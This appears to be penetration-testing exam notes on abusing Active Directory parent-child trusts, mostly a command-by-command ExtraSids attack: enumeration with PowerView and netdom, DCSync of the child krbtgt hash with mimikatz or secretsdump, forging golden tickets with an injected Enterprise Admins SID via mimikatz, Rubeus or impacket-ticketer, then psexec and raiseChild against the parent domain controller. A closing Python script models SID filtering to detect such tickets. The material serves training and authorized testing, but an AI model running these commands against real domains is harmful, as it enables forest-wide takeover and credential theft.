Cross-Domain Trusts Abuse

TODO: Add theory after exam

Enumerating Trust Relationships

# Using AD module
Import-Module activedirectory
Get-ADTrust -Filter *

# Using Powerview
Import-Module .\PowerView.ps1
Get-DomainTrust

# Using netdom
netdom query /domain:$DOMAIN trust

# Get details like type and direction of trust
Get-DomainTrustMapping

# Get DC and other machines of a domain
netdom query /domain:$DOMAIN dc
netdom query /domain:$DOMAIN workstation

# Getting users in domain
Get-DomainUser -Domain $DOMAIN | select SamAccountName

ExtraSids Attack

  • Following are the requirements to perform this attack:

    • The KRBTGT hash for the child domain (the domain you compromised)

    • The SID for the child domain

    • The name of a target user in the child domain (does not need to exist!)

    • The FQDN of the child domain

    • The SID of the Enterprise Admins group of the root domain

Throughout, the child domain is the one we have already compromised, and the root (parent) domain is the target.

From Windows

  • Using mimikatz:

# Obtaining the KRBTGT Account's NT Hash using Mimikatz
mimikatz # lsadump::dcsync /user:$DOMAIN\krbtgt

# Get-DomainSID function to get the SID for the child domain
Get-DomainSID

# Obtaining Enterprise Admins Group's SID using Get-DomainGroup
Get-DomainGroup -Domain $DOMAIN -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Creating a Golden Ticket
mimikatz # kerberos::golden /user:$NEW_USER /domain:$FQDN_CHILD_DOMAIN /sid:$CHILD_DOMAIN_SID /krbtgt:$KRBTGT_HASH /sids:$ENTERPRISE_ADMIN_SID /ptt

Check that the ticket was injected using the klist command.

  • Using rubeus:

Rubeus.exe golden /rc4:$KRBTGT_HASH /domain:$FQDN_CHILD_DOMAIN /sid:$CHILD_DOMAIN_SID /sids:$ENTERPRISE_ADMIN_SID /user:hacker /ptt

  • Now perform DCSync against the parent domain and compromise it.

From Linux

# Performing DCSync with secretsdump.py to get krbtgt hash
secretsdump.py $CHILD_DOMAIN/$USER@$DC_IP -just-dc-user $CHILD_DOMAIN/krbtgt

# Performing SID Brute Forcing using lookupsid.py
# Get Child Domain and Enterprise SIDs from here
impacket-lookupsid $CHILD_DOMAIN/$USER@$DC_IP

# Generating golden ticket
impacket-ticketer -nthash $KRBTGT_HASH -domain $FQDN_CHILD_DOMAIN -domain-sid $CHILD_DOMAIN_SID -extra-sid $ENTERPRISE_ADMIN_SID $NEW_USER

# Export the ticket
export KRB5CCNAME=$NEW_USER.ccache

# Authenticate to parent domain controller
impacket-psexec $FQDN_CHILD_DOMAIN/$NEW_USER@$PARENT_DOMAIN_DC_FQDN -k -no-pass -target-ip $PARENT_DOMAIN_DC_IP

  • Impacket also ships raiseChild, which automates the whole escalation from child to parent domain. It needs the parent domain controller as the execution target and the credentials of an administrative user in the child domain:

impacket-raiseChild -target-exec $PARENT_DOMAIN_DC_IP $FQDN_CHILD_DOMAIN/$CHILD_DOMAIN_ADMIN_USER
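The reason every command above works is the ExtraSids (SID history) field of the PAC: the root domain's DCs accept the group SIDs that the child's KDC put in the ticket, and on an intra-forest parent-child trust SID filtering is not applied by default, so the injected Enterprise Admins SID (RID 519 under the root domain's SID) survives. The script below is an added example, not part of the original notes or of any of the tools named on this page: it models the quarantine-style SID-filtering check that a forest-root DC, or a detection rule over decoded PAC data, would apply to ExtraSids, and flags any SID that does not belong to the issuing domain, with an explicit note when its RID is a privileged well-known group. All SIDs in it are constructed sample values.

```python
"""
Added example (not from the original notes): quarantine-style SID filtering
applied to the ExtraSids of a ticket issued by a trusted (child) domain.

Rule modelled: a SID in ExtraSids is accepted only if it belongs to the domain
that issued the ticket. Anything else is "foreign" and is dropped and reported;
a foreign SID whose RID is a privileged well-known group (Enterprise Admins,
Domain Admins, ...) is exactly the marker of the ExtraSids attack.
"""
import re
from dataclasses import dataclass

# Domain SID: S-1-5-21-<a>-<b>-<c>, optionally followed by a RID.
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}(?:-(\d+))?$")

# Well-known RIDs that should never arrive as ExtraSids from a trusted domain.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Constructed sample values (hypothetical child and forest-root domain SIDs).
SAMPLE_CHILD_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_ROOT_SID = "S-1-5-21-4444444444-5555555555-6666666666"


def split_sid(sid):
    """Return (domain_sid, rid). rid is None when sid is a bare domain SID."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    if m.group(1) is None:
        return sid, None
    return sid[: sid.rfind("-")], int(m.group(1))


@dataclass
class Finding:
    sid: str
    reason: str


def filter_extra_sids(issuing_domain_sid, extra_sids):
    """
    Apply SID filtering to the ExtraSids of a ticket issued by
    issuing_domain_sid. Returns (accepted, findings).
    """
    accepted, findings = [], []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain == issuing_domain_sid:
            accepted.append(sid)
            continue
        reason = f"foreign SID from domain {domain}"
        if rid in PRIVILEGED_RIDS:
            reason += f" with privileged RID {rid} ({PRIVILEGED_RIDS[rid]})"
        findings.append(Finding(sid, reason))
    return accepted, findings


def audit_ticket(account_sid, extra_sids):
    """
    Detection view: derive the issuing domain from the account SID in the
    ticket and return only the findings, i.e. what SID filtering would drop.
    """
    issuing_domain, _ = split_sid(account_sid)
    _, findings = filter_extra_sids(issuing_domain, extra_sids)
    return findings


if __name__ == "__main__":
    # A ticket shaped like the one built on this page: a child-domain user
    # carrying a child group plus the root domain's Enterprise Admins SID.
    ticket_user = SAMPLE_CHILD_SID + "-1105"
    extra = [SAMPLE_CHILD_SID + "-1106", SAMPLE_ROOT_SID + "-519"]
    for f in audit_ticket(ticket_user, extra):
        print(f"DROP {f.sid}: {f.reason}")
```

With the sample ticket, the child group SID is accepted and the root domain's RID 519 SID is reported as a foreign privileged SID, which is what quarantine (`netdom trust ... /quarantine:yes`) enforces and what a DCSync-from-child alert should key on; Microsoft does not treat intra-forest SID filtering as a security boundary, so the forest, not the domain, remains the trust boundary.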
